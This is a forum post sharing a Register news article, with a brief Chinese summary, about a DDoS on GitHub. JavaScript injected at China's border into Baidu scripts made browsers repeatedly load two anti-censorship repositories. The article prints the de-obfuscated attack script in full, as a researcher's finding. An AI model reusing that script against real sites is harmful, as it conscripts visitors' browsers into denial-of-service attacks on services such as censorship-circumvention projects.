1.媒體來源: The Register
2.完整新聞標題:
The injected JavaScript used to smash anti-Great Firewall of China GitHub
projects offline
來自百度的惡意 JavaScript 被用來攻擊 GitHub
3.完整新聞內文:
GitHub's servers are being hammered by web traffic from an army of unwitting
cyber-foot-soldiers.
It appears when thousands of people visit websites that serve ads and
tracking code from Baidu – China's answer to Google – from outside the
Middle Kingdom, network gateways on the Chinese border silently inject a
JavaScript function into those websites' pages.
This simple code instructs browsers to stealthily connect to GitHub.com every
two seconds, creating "an extremely large amount of traffic," the San
Francisco-based upstart said.
The JS specifically targets two GitHub-hosted projects – Greatfire and
CN-NYTimes – which help Chinese citizens circumvent The Great Firewall Of
China. The firewall blocks things like VPNs and censors web traffic, hiding
information on the Tiananmen Square massacre and so on.
GitHub said on Friday that the bursts in traffic, effectively a string of
distributed denial-of-service attacks, are causing intermittent outages.
"We're aware that GitHub.com is intermittently unavailable for some users
during the ongoing DDoS," GitHub said in a status update at 1549 UTC today.
"Restoring service for all users while deflecting attack traffic is our
number one priority. We've deployed our volumetric attack defenses against an
extremely large amount of traffic. Performance is stabilizing."
Hours earlier, the biz noted: "We've been under continuous DDoS attack for
24+ hours. The attack is evolving, and we're all hands on deck mitigating."
According to a security researcher at Insight Labs, HTTP requests to
hm.baidu.com/h.js are being hijacked by China's border gateways, which insert
some semi-obfuscated JavaScript to attack the aforementioned GitHub
repositories. The injected script looks like this, once unscrambled:
document.write("<script src=" +
"'http://libs.baidu.com/jquery/2.0.0/jquery.min.js'" +
">\x3c/script>");
!window.jQuery && document.write(
"<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;
function unixtime() {
var a = new Date;
return ( Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(),
a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 )
}
url_array = ["https://github.com/greatfire/",
"https://github.com/cn-nytimes/"];
NUM = url_array.length;
function r_send2() {
var a = unixtime() % NUM;
get(url_array[a])
}
function get(a) {
var b;
$.ajax({
url: a,
dataType: "script",
timeout: 1E4,
cache: !0,
beforeSend: function() {
requestTime = (new Date).getTime()
},
complete: function() {
responseTime = (new Date).getTime();
b = Math.floor(responseTime - requestTime);
3E5 > responseTime - startime && (r_send(b), count += 1)
}
})
}
function r_send(a) {
setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);
The Greatfire project provides links to cloud-hosted mirrors of websites –
such as the BBC and Google's Blogger – that Chinese people can use to dodge
the Great Firewall. While BBC.com is blocked, a cache of the broadcaster's
pages on cloudfront.net is not, it seems. CN-NYTimes similarly mirrors the
New York Times.
"A certain device at the border of China's inner network and the Internet has
hijacked the HTTP connections went into China, replaced some javascript files
from Baidu with malicious ones that would load [the GitHub pages] every two
seconds," Insight Labs' Anthr@x wrote.
"In other words, even people outside China are being weaponized to target
things the Chinese government does not like, for example, freedom of speech."
While there is no proof that the Chinese government was directly involved in
the assault, other researchers, such as F-Secure's Mikko Hypponen, noted that
someone, state or otherwise, wants these projects silenced.
發現來自百度的惡意 JavaScript 挾持不知情的網友流量 DDoS 攻擊 GitHub.
這種惡意腳本指示瀏覽器每兩秒連結一次 GitHub.com, 而給 GitHub 帶來巨大的流量。
該腳本針對 GitHub上的兩個項目 Greatfire 和 CN-NYTimes.
GitHub 表示由 DDoS 產生的突發流量造成部份服務間歇地無法使用。
目前無直接證據證明中國政府直接參與這次攻擊。
4.完整新聞連結 (或短網址): http://tinyurl.com/pydfc5f
5.備註: